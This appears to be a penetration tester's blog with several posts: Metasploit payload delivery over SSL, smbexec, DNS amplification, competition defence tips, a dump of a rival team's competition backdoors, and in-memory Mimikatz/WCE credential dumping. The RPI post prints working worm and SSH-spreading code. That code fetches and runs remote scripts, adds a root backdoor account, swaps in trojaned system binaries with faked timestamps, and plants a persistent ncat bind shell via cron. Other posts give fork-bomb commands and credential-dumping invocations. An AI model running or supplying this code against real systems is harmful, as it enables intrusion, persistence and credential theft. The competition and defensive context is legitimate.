web_delivery, powershell, SSL and you

Powershell delivery for metasploit payloads has become extremely popular for its flexibility and AV avoidance.

Metasploit recently deprecated psh_web_delivery with web_delivery which offers the ability to deliver Ruby, Python, and Powershell payloads over a webserver.



psh_web_delivery deprecated



New web_delivery module



One of the nice features is the ability to serve payloads over SSL helping to avoid detection however the default syntax will not function correctly with a self signed certificate


Executing web_delivery

Executing web_delivery


I removed the “-w hidden” command so we can see the output instead of having it execute, fail, and close the window.


Self signed SSL error

Self signed SSL error

Self signed SSL certificate could not be trusted and execution fails


However you can suppress the SSL certificate validation by adding “[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}”


Disable SSL validation

This results in successful download and execution of the powershell payload.

When I first ran into this issue I couldn’t find any posts directly related to metasploit or powershell payloads and SSL validation after some digging I found this command.

Hopefully this saves someone else a few minutes of troubleshooting.



Tagged with: , , , , , ,
Posted in InfoSec, metasploit

Defensive ideas from offensive guys – Derbycon 2013

Derbycon 2013

Posted in InfoSec

smbexec fun

Just another blog post about the basics and tools I find useful.  If you’re a pentester and you’re not using SMBexec you might be wasting some time and missing out on a well written and very helpful tool.

smbexec is available here it was written by Eric Milam (Brav0Hax) & Martin Bos (purehate_)

A few of the key features

  • Enumerate systems with domain admin logged in
  • Grab hashes
  • Dump cleartext credentials 
  • Pop shells

All done over SMB

Menu Layout


Main Menu


Enumeration Menu


Exploitation Menu


Obtain Hashes Menu

Simple example the assumption is you already compromised a host, obtained an administrator hash and you plan to replay the hash against other hosts.

Identify Hosts

Identify hosts with SMB listening

Identify hosts with SMB listening

Enumerate Shares

Enumerating Shares

Enumerating Shares

Launching a Meterpeter session over SMB

Configuring Payload

Configuring Payload

Meterpeter Payload being built

Meterpeter Payload being built

Metasploit handler being launched

Metasploit handler being launched

SMBExec Uploading and Executing

SMBExec Uploading and Executing

Sessions :-)

Sessions :-)

That should cover some basic usage for extensive video tutorials check out – http://www.youtube.com/user/Brav0Hax/videos?view=0

Tagged with: , , ,
Posted in InfoSec

DNS Amplification DoS Basics

Amplification based DoS attacks are not a new concept they were abused heavily in the 90s with ip directed broadcast attacks also known as smurf attacks.

DNS amplification attacks rely on the fact UDP DNS requests are small and can be easily spoofed with the returned data being much larger then the original request ending up hitting the victims network.

Below is a sample DIG request for Amazon.com


dig request amazon.com

Lets look at the packet size in wireshark


DNS request 81 bytes

And the response


If you look at the request and response the request was 81 bytes and the response was 879 bytes with some quick research it wouldn’t be hard to find other domains with a better rate of return however this is still a significant return on a small request.

Spoofing a DNS ALL request for ebay.com from and capturing it in tshark.


This covers the basic theory of the attack.

Attackers spoof DNS requests from the victims IP -> DNS servers respond with huge responses filling the connection of the victim.

In the wild DNS servers are often compromised and extremely large TXT records are configured resulting in replies up to 4000 bytes enhancing amplification.

Combine this entire attack with a botnet and it’s very easy to generate Gbps with relatively low traffic being sent from botnet nodes.

For more details on these attacks in the wild check out the defcon 14 talk by Randal Vaughn – http://www.youtube.com/watch?v=-mBzpMeiqec


There are a number of methods to prevent your DNS servers from being abused in this way the easiest is filtering recursive requests and rate limiting DNS traffic.

You can check for known open resolvers on your network here – http://openresolverproject.org/

Tagged with: , , , ,
Posted in InfoSec

ISTS – Defense



More info on the ISTS event here http://ists.sparsa.org

Some tips/tricks from a Red team members point of view on improving defense.

You need to start this event keeping two important concepts in mind.

1.  You will get hacked.

2.  Your systems have multiple vulnerabilities by design.

Default Credentials

All passwords on all systems will be in some weak or default configuration changing these immediately will help stop automated attacks.

Common System Misconfigurations

It’s common for a lot of teams to not have an understanding of the current services running on their Linux machines issuing a quick “netstat -anp | grep LISTEN” as root will show open ports and related process/program name.


VNC with no password
q8KPSbc (1)

Red team viewing blue team machine over VNC

VNC can be configured with no password and give complete console access to the machine.  In addition to no password there have also been authentication bypass expliots and often times its configured with a weak password.

Web Based Management Tools

Webmin(Port 10000) and PHPMyAdmin are often used to remotely administer Linux machines they can be configured with various authentication mechanisms this is another great place to look for default credentials.

Sudoers file

During the competition and even at the beginning be mindful of /etc/sudoers this file controls who has access to sudo and the ability to run commands as root.

FTP Configuration Issues

FTP is often configured with anonymous FTP enabled, Versions that have known exploits, or allowing access to sensitive files.

During this years competition it was configured to serve up / and combined with the weak permissions it made accessing /etc/shadow and other sensitive files trivial.

MySQL root no password

MySQL configured with a root account and no password is a common configuration mistake but can lead to all kinds of fun things.


Incorrect permissions

Permissions on /etc/shadow allowed any user to view this file and allowed access to all the hashes.

These were dumped by a PHP backdoor with the user account www-data


Insecure Web Applications

There were a number of web vulnerabilities including local file inclusion and multiple backdoors such  as the c99 shell in shell.php.

This is an area that might take some work using grep and other tools to look for insecure functions and obvious backdoors in web applications.




Scoring Engine Checks

The scoring engine checks the availability of many services by logging in with SSH/FTP.  Depending on the configuration of these accounts they usually had access to ssh and interactive login.

Even with normal user privileges there was still attack surface for denial of service attacks including filling up the hard drive with random files or launching a fork bomb.

perl -e “fork while fork” &

:(){ :|:& };:

cat /dev/urandom > randomfile &

These attacks can be mitigated by using the ulimit command and making changes to /etc/security/limits.conf

Windows Security


This shouldn’t need mentioning but if you’re doing a CTF style even and you see an XP/2003 box there is a very good chance its vulnerable to MS08-067 or if you come across Vista SP1/SP2 or server 2008 might want to look for MS09-050

these exploits get popped quickly and you will be fighting a battle to remove any level of persistance by the red team or other teams.


Enabling the windows firewall to block 139/445 and other services that don’t need remote access will be critical.


Once compromised its trivial to dump cleartext windows passwords out of memory keep this in mind if you’re reusing the same admin password or password style across multiple machines.

It’s also extremely easy to dump the password hashes even if you used a complex password teams can regain access by launching psexec over 445 and using the password hash to login.

What now?

A few tips to get you started

Familiarize your self with the various locations commands get launched from on boot.  An example of this would be HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Be mindful of all temp directories and odd looking files.

Learn how to use the sysinternals tools to detect backdoors.  There are a number of great articles on detecting malware process explorer, tcpview, and other sysinternals tools.

Log files are your friend unless someone deletes them :-)

If you detect compromise remember to rotate your windows passwords quickly.

The last point is make sure you’re having fun

More details from another ISTS Redteam member can be found here – http://www.antitree.com/ists-x/

ISTS Redteam Reddit – http://www.reddit.com/r/istsredteam

Tagged with: , , , ,
Posted in InfoSec

RPI Toolkit – ISTS X

It’s my second year red teaming the ISTS event at RIT.  ISTS is a event similar to CCDC where teams protect a network from the red team while doing business injects.  The twist with ISTS is teams can play offense against each other.

Every year RPI does an amazing job with custom scripts and backdoors.

RPI 2012


import threading, subprocess, re, socket, time, sys

def list_ip():
 yield ''
 first = int(sys.argv[1])
 second = int(sys.argv[2])
 for item in range(1,14):
 if item in [first, second]:
 for sub in [10, 20, 30]:
 yield '10.0.%s.%s' % (item, sub)

 for item in range(1,14):
 if item in [first, second]:
 yield socket.gethostbyname('priceofwales.team%s.ists' % item)
 yield socket.gethostbyname('missouri.team%s.ists' % item)
def get_ports():
 output = subprocess.check_output("netstat -l -t -n", shell=True)
 output = [x for x in output.split("\n") if 'unix' not in x]
 output = "\n".join(output)
 print output
 ports = [m.group(1) for m in re.finditer(':([0-9]+)', output)]
 print ports
 ports = map(int, ports)
 print ports
 for port in ports:
 if port >= 1024:
 yield port

def spawn_thread(ip, port):
 a = threading.Thread(target = attack_thread, args=(ip, port))

def attack_thread(ip, port):

 attack = """
mkdir /var/tmp
wget http://xxxxxxxx.cs.rpi.edu/~xxxxxxx/unlisted/debian-installer.sh -O /var/tmp/installer.sh
bash /var/tmp/installer.sh
rm /var/tmp/installer.sh
useradd -g 0 -G 0,1,2,3,4,6,10 -M util -p `mkpasswd rpisec412180`
useradd -g 0 -G 0,1,2,3,4,6,10 -M util
passwd --stdin rpisec412180
echo "util ALL=(ALL) ALL" >> /etc/sudoers
apt-get install openssh-server -y

wget http://dl.dropbox.com/u/xxxxxx/twitter_r.py -O /var/tmp/twitter_r.py
wget http://dl.dropbox.com/u/xxxxxx/get_access_token.py -O /var/tmp/get_access_token.py
wget http://dl.dropbox.com/u/xxxxxx/twitter.py -O /var/tmp/twitter.py

python /var/tmp/twitter_r.py &
sleep 1
rm /var/tmp/twitter_r.py
rm /var/tmp/twitter.py
rm /var/tmp/get_access_token.py


 print ip, port
 sock = socket.create_connection((ip, port))
 while True:

def attack():
 for port in get_ports():
 for ip in list_ip():
 spawn_thread(ip, port)
if __name__ == "__main__":


wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/linux-agent -O /tmp/linux-agent -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/bin/ls -O /tmp/ls -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/lsdebian/bin/ps -O /tmp/ps -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/bin/rm -O /tmp/rm -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/bin/unlink -O /tmp/unlink -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/bin/top -O /tmp/top -q
wget http://xxxxxx.cs.rpi.edu/~xxxxxx/unlisted/backdoored-utilities/debian/lib/libproc-3.2.8.so -O /tmp/libproc-3.2.8.so -q
chmod 755 /tmp/ls
chmod 755 /tmp/ps
chmod 755 /tmp/rm
chmod 755 /tmp/unlink
chmod 755 /tmp/top
mv /tmp/ls /bin
mv /tmp/ps /bin
mv /tmp/rm /bin
mv /tmp/top /usr/bin
mv /tmp/unlink /usr/bin
mv /tmp/libproc-3.2.8.so /lib
touch -d "2008-04-04 10:22" /bin/ls
touch -d "2009-01-11 16:49" /bin/ps
touch -d "2008-04-04 10:22" /bin/rm
touch -d "2008-04-04 10:22" /usr/bin/unlink
touch -d "2009-01-11 16:49" /lib/libproc-3.2.8.so
touch -d "2009-01-11 16:49" /usr/bin/top
chmod 755 /tmp/linux-agent
mv /tmp/linux-agent "/sbin/dhclient3_1337_"
touch -d "2008-08-12 10:09" /sbin/dhclient3_1337_
echo -e "\tpost-up /sbin/dhclient3_1337_" >> /etc/network/interfaces

2013 RPI stepped it up again.

After exploiting one of RPIs machines I was searching for useful data and pulled down a tarball containing


Then downloaded all referenced files


Quick over view of files

a.out 64.out 32.out are compiled versions of main.c

aptpayload.txt and s.sh are dropped when main.c exploits a host with default credentials

inet, Packages, sources.list are all part of the aptpayload

The rest of the files are rc scripts for metasploit including ssh scanners and post exploitation with metasploit persistance.

Here we go


#include <libssh/libssh.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

int kill(char * host, char * username);

int main()
 char host[256];
 int i;
 for (i = 1; i <= 7; i++) {
 sprintf(host, "10.0.%d.100", i);
 kill(host, "root");
 kill(host, "administrator");
 sprintf(host, "10.0.%d.101", i);
 kill(host, "root");
 kill(host, "administrator");
 for (i = 8; i <= 12; i++) {
 sprintf(host, "10.0.%d.100", i);
 kill(host, "root");
 kill(host, "administrator");
 sprintf(host, "10.0.%d.101", i);
 kill(host, "root");
 kill(host, "administrator");
 return 1;

int kill(char * host, char * username) {
 pid_t pid = fork();
 if (pid != 0) {
 return 1;
 unsigned int nbytes;

ssh_session my_ssh_session = ssh_new();
 if (my_ssh_session == NULL) {
 printf("Error initializing ssh conn\n");

ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, "");

int rc = ssh_connect(my_ssh_session);
 if (rc != SSH_OK)
 fprintf(stderr, "Error connecting to localhost: %s\n",

rc = ssh_userauth_password(my_ssh_session, "root", "changeme");
 if (rc != SSH_AUTH_SUCCESS) {
 fprintf(stderr, "Error authenticating with password: %s\n",

ssh_channel channel = ssh_channel_new(my_ssh_session);
 if (channel == NULL) {
 fprintf(stderr, "Error channel new creation: %s\n",
 rc = ssh_channel_open_session(channel);
 if (rc != SSH_OK)
 rc = ssh_channel_request_exec(channel,
"wget http://xxxxxx.cs.rpi.edu/~xxxxxxxxxx/ists/aptpayload.txt
&& chmod +x aptpayload.txt && ./aptpayload.txt; rm aptpayload.txt;
wget xxx.xxx.xxx.xxx/ists/s.sh && chmod +x s.sh && ./s.sh; rm ./s.sh");
 if (rc != SSH_OK)
 char buffer[256];
 nbytes = ssh_channel_read(channel, buffer, sizeof(buffer), 0);
 while (nbytes > 0)
 if (write(1, buffer, nbytes) != nbytes)
 nbytes = ssh_channel_read(channel, buffer, sizeof(buffer), 0);
 if (nbytes < 0)




sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 1A44B9C399E17A16
wget http://debianmirror.org/sources.list -O /etc/apt/sources.list
apt-get update
apt-get install -y inetutils-ping



chattr -i /tmp/session.sh
echo "ncat -l 57298 -e /bin/bash -k" > /bin/session.sh
chmod +x /bin/session.sh
chattr +i /bin/session.sh
/bin/session.sh &
chattr -i /etc/crontab
echo "" >> /etc/crontab
echo "" >> /etc/crontab
echo "* * * * * root /bin/session.sh > /dev/null 2>&1" >> /etc/crontab
chattr +i /etc/crontab

Quick strings on the replaced ping command


A few thoughts for RPI and other teams

Be prepared to handle multiple operating systems ISTS often changes operating systems last minute or without notice.

Work harder on protecting scripts/back doors and include obfuscation techniques.

A few of the MSF scripts had commands out of order and would have made it impossible for them to work properly.

Looking forward to what they bring out next year :-)

Tagged with: , , , , ,
Posted in InfoSec

WCE and Mimikatz in memory over meterpreter

While hashes are great and passing the hash is an effective attack method it never hurts to have plain text passwords. Companies tend to reuse passwords on various systems or use the same password style across their network.

Currently the two primary tools for doing this are WCE and Mimikatz both methods will be shown over an existing meterpeter session.

First up WCE the old way dropping a binary


Uploading wce.exe over a meterpreter session

Dropping to shell and executing WCE

Dropping to shell and executing wce

As you can see this involves dropping a binary to the target machine.

This process was  automated with a post exploitation script which uploads and executes wce.  It can be found http://pastebin.com/kQ41wLM7 and was written by @jabjorkhaug

Time to take a look at the execute command


-m looks like a fun option

Running in memory will give you a better chance of anti virus avoidance.

Lets try WCE again without dropping the binary


Launching WCE in memory from meterpreter

execute -H -i -c -m -d calc.exe -f /root/wce.exe -a  -w

Next up Mimikatz


Launching Mimikatz in memory from meterpreter

execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a  ‘”sekurlsa::logonPasswords full” exit’

While both of these are executed in memory WCE writes a DLL to disk when its running.  Mubix has a detailed blog post on Mimikatz in memory this gives Mimikatz  a great advantage over WCE since it never touches disk.

More information on in memory execuction can be found here – Eternal Sunshine of the Spotless RAM

Mimikatz – http://blog.gentilkiwi.com/mimikatz

Mimikatz english version – https://github.com/thomhastings/mimikatz-en

Windows Credential Editor(WCE) – http://www.ampliasecurity.com/research.html

Metasploit – http://www.metasploit.com/download/

Tagged with: ,
Posted in InfoSec
  • @obscuresec We can partner on a retroactive threat intel service... 1 hour ago
  • @HackingDave It's actually a unique situation they don't have a lot to lose with current sanctions and limited internet presence 1 hour ago
  • I can only hope that N Korea outsourced this hack to Iran so everyones cyber hype and dreams can come true. 1 hour ago
  • Attribution can't be that hard North Korea only has something like 1024 IPs 1 hour ago
  • @spacerog probably the 2-3 people left on EFnet 2 hours ago
  • RT @ozchrisrock: BREAKING NEWS: North Korea threatens to attack if another Nickelback album is released. 2 hours ago
  • RT @mikeryan: J.J. Abrams: "Hello?" "Hello, this is North Korea. You will not show The Force Awakens." Abrams: "I know this is you, Harr… 4 hours ago

Get every new post delivered to your Inbox.